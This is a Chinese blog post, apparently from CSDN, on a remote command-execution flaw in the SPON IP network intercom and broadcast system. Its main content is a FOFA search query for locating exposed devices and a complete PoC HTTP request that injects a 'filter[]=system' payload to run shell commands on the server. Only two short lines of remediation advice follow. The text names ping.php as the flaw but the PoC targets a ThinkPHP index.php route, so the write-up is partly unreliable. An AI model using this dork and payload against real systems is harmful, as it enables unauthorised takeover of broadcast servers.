首页 > 其他分享 >[SPON IP]网络对讲广播系统的命令执行漏洞实验

[SPON IP]网络对讲广播系统的命令执行漏洞实验

时间:2024-07-31 21:55:34浏览次数:16  
标签:index IP 漏洞 SPON 广播系统 php

产品简介

                  世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

-----------------------------------

漏洞描述

                 世邦通信 SPON IP网络对讲广播系统 ping.php 存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器

-----------------------------------

网络空间测绘:

fofa:           icon_hash="-1830859634"

      

              开启抓包:

         发送到重放器:

          漏洞利用:

                  poc:

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

 

 

 

修复建议:

                     1、升级至最新安全版本。
                     2、限制接口访问。

标签:index,IP,漏洞,SPON,广播系统,php
From: https://blog.csdn.net/muyuchen110/article/details/140829655

相关文章

  • JavaScript(四)——JavaScript 语法
    目录JavaScript语法JavaScript字面量JavaScript变量JavaScript操作符JavaScript语句JavaScript关键字JavaScript注释JavaScript数据类型JavaScript函数JavaScript字母大小写JavaScript字符集驼峰命名法小驼峰命名法大驼峰命名法(帕斯卡命名法)JavaS......
  • iStore实现 SmartDNS + AdGuard Home IP优选+广告屏蔽
    iStore实现SmartDNS+AdGuardHomeIP优选+广告屏蔽参考自openwrt官方版安装配置AdGuardHome+smartdns告别广告烦扰教程软路由实测系列五SmartDNS和AdGuardHome都是用于优化DNS解析和提供广告拦截功能的工具,但它们各自有不同的特点和用途:SmartDNS主要功......
  • javascript(三)
    五、事件发生在HTML元素上的事情,当在HTML页面中使用JavaScript时,JavaScript可以触发这些事件1.常用事件事件描述onchangeHTML元素改变onclick点击onmouseover鼠标移入onmouseout鼠标移出onkeydown按下键盘onload浏览器已完成页面的加载......
  • 「NOIP2017_Junior」图书管理员
    题目题目描述图书馆中每本书都有一个图书编码,可以用于快速检索图书,这个图书编码是一个正整数。每位借书的读者手中有一个需求码,这个需求码也是一个正整数。如果一本书的图书编码恰好以读者的需求码结尾,那么这本书就是这位读者所需要的。小D刚刚当上图书馆的管理员,她......
  • 【动态路由协议】RIP
    一、前导知识       动态路由协议分类:               1.IGP(内部网关协议,位于同一个自治系统内)                       1.1距离矢量路由协议                               RIP(距离矢......
  • 基于 STM32 的 NAS私有云盘搭建:集成LwIP 协议、HTTP/HTTPS、WEB前端技术栈(代码示例)
    项目概述在本项目中,我们将搭建一个基于STM32的NAS(网络附加存储)私盘,通过网络访问存储在外部SATA硬盘上的文件。该项目将使用STM32开发板、外接SATA硬盘、LwIP协议栈以及FATFS文件系统来实现文件的上传、下载和管理,用户可以通过简单的Web界面进行操作。系统设计......
  • el-table数据中特殊字符tooltip换行展示并且列表中超出显示省略号
     <el-table-column prop="baMsg" label="描述信息">             <template slot-scope="scope">                <el-tooltip class="item" effect="dark" placement="top-start">           ......
  • 交叉编译工具链toolchain bin文件作用 gcc g++ ld ar as nm strip objdump
    前言全局说明交叉编译工具链toolchainbin文件作用gccg++ldarasnmstripobjdump一、说明二、bin文件功能arm-xxxx-linux-gcc #GNU的C语言编译器arm-xxxx-linux-g++ #GNU的C++语言编译器arm-xxxx-linux-cpp #GNU的C的预编译器arm-xxxx-linux-gcov #gcc的......
  • P1351 [NOIP2014 提高组] 联合权值
    原题链接题解树形dp的想法,递归返回的是子树的最大联合权值以及联合权值之和。首先,根据题目意思可以知晓该无向图构成的是一棵树。由树形dp的遍历可知,当我们来到root结点时,其所有孩子结点的子树最大联合权值和联合权值之和都已经知晓,我们只需要对其取max和累加即可。......
  • 建议所有iPhone升级!苹果iOS 17.6正式版发布:重要错误修复
    苹果发布iOS17.6正式版升级,本次更新距离iOS17.5发布已有两个月时间。升级日志显示,iOS17.6提供重要的错误修复和安全性更新,苹果建议所有用户安装。不出意外的话,iOS17.6将是iOS17最后几次更新之一,后续将仅提供必须的安全更新和Bug修复,苹果的开发重心会转移到iOS18上。根据......